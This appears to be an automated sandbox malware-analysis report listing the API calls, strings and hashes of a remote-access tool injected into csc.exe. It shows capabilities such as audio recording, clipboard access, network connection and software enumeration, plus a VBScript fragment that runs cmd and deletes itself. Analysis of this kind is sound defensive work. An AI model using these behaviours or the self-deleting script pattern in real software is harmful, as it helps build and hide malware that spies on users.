                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                                                                                                                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                                                                                                                                                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                                                                                                                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                                                                                                                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                                                                                                                                      • SetEvent.KERNEL32 ref: 0041B219
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0041B23A
                                                                                                                                                                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                                                                                                                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                                                                      • API String ID: 738084811-2094122233
                                                                                                                                                                                      • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                                                                                                                                                                      • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                                                                                                                                      • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                      • API String ID: 1646373207-1877645540
                                                                                                                                                                                      • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                                                                                                                      • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                                                                                                                      • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                                                                                                                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                                                                                                                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0041C13B
                                                                                                                                                                                      • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041C173
                                                                                                                                                                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041C1D0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                      • API String ID: 3941738427-1684325040
                                                                                                                                                                                      • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                                                                                                                                                                      • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                                                                                                                                      • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3899193279-0
                                                                                                                                                                                      • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                                                                                                                      • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                                                                                                                      • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseEnumOpen
                                                                                                                                                                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                                      • API String ID: 1332880857-3714951968
                                                                                                                                                                                      • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                                                                                                                                                                      • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                                                                                                                                      • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0041D665
                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0041D66B
                                                                                                                                                                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                      • String ID: Close
                                                                                                                                                                                      • API String ID: 1657328048-3535843008
                                                                                                                                                                                      • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                                                                                                                      • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                                                                                                                                      • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                                                                                                                      • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                                                                                                                                        • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                                                                                                                                        • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                                                                                                                        • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                                                                                                                        • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                                                                                                                                                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                      • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                                                                      • API String ID: 3795512280-1152054767
                                                                                                                                                                                      • Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                                                                                                                                                                                      • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                                                                                                                                      • Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                                                                                                                                                                                      • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                      • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                      • API String ID: 994465650-3229884001
                                                                                                                                                                                      • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                                                                                                                                                                      • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                                                                                                                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                                                                                                                                      • _free.LIBCMT ref: 004512FF
                                                                                                                                                                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                                      • _free.LIBCMT ref: 00451321
                                                                                                                                                                                      • _free.LIBCMT ref: 00451336
                                                                                                                                                                                      • _free.LIBCMT ref: 00451341
                                                                                                                                                                                      • _free.LIBCMT ref: 00451363
                                                                                                                                                                                      • _free.LIBCMT ref: 00451376
                                                                                                                                                                                      • _free.LIBCMT ref: 00451384
                                                                                                                                                                                      • _free.LIBCMT ref: 0045138F
                                                                                                                                                                                      • _free.LIBCMT ref: 004513C7
                                                                                                                                                                                      • _free.LIBCMT ref: 004513CE
                                                                                                                                                                                      • _free.LIBCMT ref: 004513EB
                                                                                                                                                                                      • _free.LIBCMT ref: 00451403
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                      • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                      • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                                                                                                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                                                                                                                        • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                                                                                                                                                                        • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                                                                                                                                                                        • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                      • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                      • API String ID: 1913171305-3159800282
                                                                                                                                                                                      • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                                                                                                                                                                      • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                      • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                                      • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                                                                                                                                      • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                                      • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043A937
                                                                                                                                                                                      • _free.LIBCMT ref: 0043A943
                                                                                                                                                                                      • _free.LIBCMT ref: 0043A94A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2441525078-0
                                                                                                                                                                                      • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                                                                                                                                                                      • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                                                                                                                                                                      • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                      • API String ID: 2956720200-749203953
                                                                                                                                                                                      • Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                                                                                                                                                                                      • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                                                                                                                                      • Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                                                                                                                                                                                      • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenClipboard.USER32 ref: 00416941
                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0041694F
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00416955
                                                                                                                                                                                      • OpenClipboard.USER32 ref: 0041695C
                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00416975
